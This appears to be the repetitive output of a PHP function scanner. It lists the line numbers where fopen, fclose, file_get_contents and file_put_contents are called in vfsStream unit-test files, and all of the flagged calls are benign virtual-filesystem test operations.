    Ligne497: fclose($fp);
    Ligne636: fclose($handle);
    Ligne656: fclose($handle);
    file_get_contents was found in the file vfsStreamWrapperTestCase.php
    Ligne617: $this->assertFalse(file_get_contents(vfsStream::url('file.txt')));
    Ligne635: $this->assertEquals('', file_get_contents($this->baz1URL));
    Ligne655: file_get_contents($this->baz1URL));
    fopen was found in the file vfsStreamWrapperTestCase.php
    Ligne493: $fp = fopen($this->baz2URL, 'r');
    Ligne632: $handle = fopen($this->baz1URL, 'r+');
    Ligne651: $handle = fopen($this->baz1URL, 'r+');
    file_get_contents was found in the file vfsStreamWrapperTestCase.php
    Ligne617: $this->assertFalse(file_get_contents(vfsStream::url('file.txt')));
    Ligne635: $this->assertEquals('', file_get_contents($this->baz1URL));
    Ligne655: file_get_contents($this->baz1URL));
    fclose was found in the file vfsStreamWrapperTestCase.php
    Ligne497: fclose($fp);
    Ligne636: fclose($handle);
    Ligne656: fclose($handle);
    fopen was found in the file vfsStreamWrapperTestCase.php
    Ligne493: $fp = fopen($this->baz2URL, 'r');
    Ligne632: $handle = fopen($this->baz1URL, 'r+');
    Ligne651: $handle = fopen($this->baz1URL, 'r+');
    file_get_contents was found in the file vfsStreamWrapperTestCase.php
    Ligne617: $this->assertFalse(file_get_contents(vfsStream::url('file.txt')));
    Ligne635: $this->assertEquals('', file_get_contents($this->baz1URL));
    Ligne655: file_get_contents($this->baz1URL));
    fclose was found in the file vfsStreamWrapperTestCase.php
    Ligne497: fclose($fp);
    Ligne636: fclose($handle);
    Ligne656: fclose($handle);
    fopen was found in the file vfsStreamWrapperSetOptionTestCase.php
    Ligne41: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne51: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne61: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne71: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperSetOptionTestCase.php
    Ligne43: fclose($fp);
    Ligne53: fclose($fp);
    Ligne63: fclose($fp);
    Ligne73: fclose($fp);
    fopen was found in the file vfsStreamWrapperSetOptionTestCase.php
    Ligne41: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne51: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne61: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne71: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperSetOptionTestCase.php
    Ligne43: fclose($fp);
    Ligne53: fclose($fp);
    Ligne63: fclose($fp);
    Ligne73: fclose($fp);
    fopen was found in the file vfsStreamWrapperSetOptionTestCase.php
    Ligne41: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne51: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne61: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne71: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperSetOptionTestCase.php
    Ligne43: fclose($fp);
    Ligne53: fclose($fp);
    Ligne63: fclose($fp);
    Ligne73: fclose($fp);
    fopen was found in the file vfsStreamWrapperSetOptionTestCase.php
    Ligne41: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne51: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne61: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne71: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperSetOptionTestCase.php
    Ligne43: fclose($fp);
    Ligne53: fclose($fp);
    Ligne63: fclose($fp);
    Ligne73: fclose($fp);
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
